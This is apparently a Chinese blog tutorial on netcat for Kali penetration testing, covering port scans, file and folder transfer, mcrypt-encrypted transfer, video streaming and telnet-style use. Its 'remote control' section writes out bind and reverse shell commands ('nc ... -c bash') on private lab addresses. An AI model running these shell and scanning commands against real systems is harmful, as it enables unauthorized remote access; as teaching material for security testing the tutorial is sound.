netcat被称作是网络工具当中的瑞士军刀,短小却功能强大

1.端口扫描

nc -nvz 目标IP 端口范围

eg:

nc -nvz 192.168.1.105 1-65535

-n参数是不要使用DNS反向查询IP地址对应的域名,会影响速度

-v参数是输出详细信息

-z参数是不进行数据交换,仅仅知道端口开放就行

也可以加上-u参数,以udp探测

2.传输文本信息

A:
nc -lp 端口
B:
nc -nv A的IP 端口

eg:

A:
nc -lp 3333
B:
nc -nv 192.168.1.105 3333

-l是监听

-p指定本地端口

3.传输文件

从A到B
A:
nc -lp 端口 < 文件 -q 1
B:
nc -nv A的IP 端口 > 文件

eg:

A:
nc -lp 3333 < 1.txt -q 1
B:
nc -nv 192.168.1.105 3333 > 1.txt
从B到A
A:
nc -lp 端口 > 文件
B:
nc -nv A的IP 端口 < 文件 -q 1

eg:

A:
nc -lp 3333 > 1.txt
B:
nc -nv 192.168.1.105 3333 < 1.txt -q 1

-q 1 代表传输完文件之后等待1秒钟关闭连接

4.传输文件夹

从A到B
A:
tar -cvf- 文件夹 | nc -lp 端口 -q 1
B:
nc -nv A的IP 端口 | tar -xvf-

eg:

A:
tar -cvf- py | nc -lp 3333 -q 1
B:
nc -nv A的IP 端口 | tar -xvf-
从B到A
A:
nc -lp 端口 | tar -xvf-
B:
tar -cvf- 文件夹 | nc -nv A的IP 端口 -q 1

eg:

A:
nc -lp 3333 | tar -xvf-
B:
tar -cvf- test | nc -nv 192.168.1.104 3333 -q 1

原理是发送端将文件夹压缩传输,接收端将文件夹还原接收

5.加密传输文件

要在kali里面安装mcrypt

apt-get install mcrypt
从A到B
A:
mcrypt --flush -Fbq -a rijndael-256 -m ecb < 文件 | nc -lp 端口 -q 1
B:
nc -nv A的IP 端口 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 文件

eg:

A:
mcrypt --flush -Fbq -a rijndael-256 -m ecb < 1.txt | nc -lp 3333 -q 1
B:
nc -nv 192.168.1.104 3333 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 1.txt
从B到A
A:
nc -lp 端口 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 文件
B:
mcrypt --flush -Fbq -a rijndael-256 -m ecb < 文件 | nc -nv A的IP 端口
-q 1

eg:

A:
nc -lp 3333 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 1.txt
B:
mcrypt --flush -Fbq -a rijndael-256 -m ecb < 1.txt | nc -nv 192.168.1.104 3333 -q 1

连接成功以后输入相同的秘钥就Ok了

6.流媒体

安装mplayer

apt-get install mplayer
A到B
A:
cat 视频 | nc -lp 端口
B:
nc -nv A的IP 端口 | mplayer -vo x11 -cache 1000 -

eg:

A:
cat 1.flv | nc -lp 3333
B:
nc -nv 192.168.1.104 3333 | mplayer -vo x11 -cache 1000 -
B到A:
A:
nc -lp 端口 | mplayer -vo x11 -cache 缓存 -
B:
cat 视频 | nc -nv A的IP 端口

eg:

A:
nc -lp 3333 | mplayer -vo x11 -cache 1000 -
B:
cat 1.flv | nc -nv 192.168.1.104 3333

-vo是选择输出模式

-cache是缓存大小

7.克隆设备

本人没用过这个功能…就不说了

8.远程控制

正向
A:
nc -lp 端口 -c bash
B:
nc -nv A的IP 端口

eg:

A:
nc -lp 3333 -c bash
B:
nc -nv 192.168.1.104 3333
反向
A:
nc -lp 端口
B:
nc -nv A的IP 端口 -c bash

A:
nc -lp 3333
B:
nc -nv 192.168.1.104 3333 -c bash

-c是使用命令行,如果是Windows主机,需要把bash改成cmd

正向是A被控制,反向是B被控制

9.telnet

nc -nv 目标IP 端口

eg:

nc -nv 192.168.0.108 80

然后可以交互式输入,例如输入head敲回车,会返回网页的头

 
 

Kali渗透测试工具-netcat的更多相关文章

  1. Kali渗透测试工具-nslookup

    1.交互模式 终端输入nslookup进入交互模式 (1)查询A地址记录(默认) set q=a A记录简单理解将域名转换成对应的IP地址 (2)查询mail exchanger set q=mx m ...

  2. 自动渗透测试工具集APT2

    自动渗透测试工具集APT2   APT2是Kali Linux新增的一款自动渗透测试工具集.它可以进行NMAP扫描,也可以直接读取Nexpose.Nessus和NMAP的扫描结果,然后自动进行渗透测试 ...

  3. GyoiThon:基于机器学习的渗透测试工具

    简介 GyoiThon是一款基于机器学习的渗透测试工具. GyoiThon根据学习数据识别安装在Web服务器上的软件(操作系统,中间件,框架,CMS等).之后,GyoiThon为已识别的软件执行有效的 ...

  4. 轻量级Web渗透测试工具jSQL

    轻量级Web渗透测试工具jSQL jSQL是Kali集成的一款轻量级的Web渗透测试工具.最初该工具主要实施SQL注入,后来增加更多的功能,扩展形成一个综合性的Web渗透测试工具.Kali提供的版本较 ...

  5. 全能无线渗透测试工具,一个LAZY就搞定了

    近来一直在研究无线安全方面的东西,特别是在无线渗透测试这块,每次渗透测试时总要来回不停的切换操作和挑选利器,很是麻烦.就想看看是否可以有一款功能全面的集合型工具. 正所谓功夫不负有心人,还真有这么一个 ...

  6. 自动化渗透测试工具(Cobalt Strike)3.1 最新破解版

    自动化渗透测试工具(Cobalt Strike)3.1 最新破解版[附使用教程] Cobalt Strike是一款专业的自动化渗透测试工具,它是图形化.可视化的,图形界面非常友好,一键傻瓜化使用MSF ...

  7. 使用C#winform编写渗透测试工具--Web指纹识别

    使用C#winform编写渗透测试工具--web指纹识别 本篇文章主要介绍使用C#winform编写渗透测试工具--Web指纹识别.在渗透测试中,web指纹识别是信息收集关键的一步,通常是使用各种工具 ...

  8. 渗透测试工具BurpSuite做网站的安全测试(基础版)

    渗透测试工具BurpSuite做网站的安全测试(基础版) 版权声明:本文为博主原创文章,未经博主允许不得转载. 学习网址: https://t0data.gitbooks.io/burpsuite/c ...

  9. 渗透测试工具之sqlmap

    1. sqlmap是什么 在这个数据有价的时代数据库安全已经成为了重中之重,于是就整理了一下最常用的一款(反正我上大学的时候它还是蛮流行的...)数据库安全方面的渗透测试工具sqlmap的使用笔记. ...

随机推荐

  1. duplicate symbols for architecture arm64 导入的类库字符重复

    这个错误大部分时候是引用库重复定义的问题. 项目需要,同时引用ZBar和QQ授权登录SDK,由于二者均使用了Base64处理数据,XCode编译时报错: duplicate symbol _base6 ...

  2. ie 兼容

    ese,promise解决text/babel <script src="https://cdnjs.cloudflare.com/ajax/libs/babel-polyfill/7 ...

  3. IPC进程间通信---共享内存

    共享内存 共享内存:共享内存就是分配一块能被其它进程访问的内存.每个共享内存段在内核中维护着一个内部结构shmid_ds, 该结构定义在头文件linux/shm.h中,其结构如下: struct sh ...

  4. 关于“CheckBox”通过表单提交的问题

    大多数时候CheckBox取值传到java后台都是通过js取值,ajax传值,今天改一离职同事的老代码,那家伙通过表单提交一些列的CheckBox设置,没想到的是后台死活接收不正常,name.valu ...

  5. Debian中CodeIgniter+nginx+MariaDB+phpMyAdmin配置

    本文不讲述软件安装过程,记述本人在Debia中配置CodeIgniter时遇到的问题及解决方法,希望能够为有需要的人提供帮助. 一.Debian版本及所需的软件 Debian 9.8 stretch ...

  6. Spring quantz--定时任务调度工具

    1.在xml中交给spring管理的一些类 <bean id="cancelOrderJobDetail" class="org.springframework.s ...

  7. JAVA基础 - 类的构造与实例化

    一个简单的demo,主要运用: 抽象类,类的继承 类的实例化,构造函数 @Override重写父类方法 package week4; abstract class Person { void show ...

  8. 18CCPC网赛A 贪心

    Buy and Resell Time Limit: 2000/1000 MS (Java/Others)    Memory Limit: 65536/65536 K (Java/Others)To ...

  9. MongoDB入门---文档查询之$type操作符&limit方法&skip方法&简单排序(sort)操作

    上一篇文章呢,已经分享过了一部分查询操作了,这篇文章呢?就来继续分享哈.接下来呢我们直接看MongoDB中的$type操作符哈.它呢是基于BSON类型来检索集合中匹配的数据类型,并且返回结果,在Mon ...

  10. 20145202马超《网络对抗》Exp6 信息搜集与漏洞扫描

    本实践的目标是掌握信息搜集的最基础技能.具体有(1)各种搜索技巧的应用(2)DNS IP注册信息的查询 (3)基本的扫描技术:主机发现.端口扫描.OS及服务版本探测.具体服务的查点(4)漏洞扫描:会扫 ...